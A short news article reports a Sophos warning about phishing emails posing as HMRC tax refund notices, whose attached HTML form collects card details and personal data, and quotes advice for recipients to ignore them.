Security firm issues warning about spam campaign that exploits HMRC tax error refund

Phishers have been quick to seize the initiative in a week where it has been revealed that up to 6 million people will be written to about issues with their tax.

As has been widely reported in the news, tax authorities are writing to millions of people in the UK to inform them that they have been paying the wrong amount of tax. For some it will mean a rebate, while for others it could mean that they will be forced to cough-up for unpaid tax following errors made at HMRC.

IT security firm Sophos is already seeing emails that claim to have come from HMRC, often with the line 'You have an HMRC Refund' while informing the recipient that they have supposedly made overpayments.

The email goes on to say that an attached form must be completed before a refund can be processed. Attached to the email is a file called 'Refund-Form.zip', which contains an HTML file called 'Refund-Form.htm' which asks for information including credit card details, full date of birth and mother's maiden name.

"If you do make the mistake of filling in the form, your confidential data is uploaded to a Chinese server. You're not going to receive a windfall because of this form - you've just been phished," said Graham Cluley, senior technology consultant at Sophos.

"The real HMRC website contains advice about scams like this, and clearly states that they would never inform customers of a tax rebate via email, or invite them to complete an online form to receive a rebate of tax. You have been warned - don't let your eagerness for a tax refund lead you to throw caution to the wind."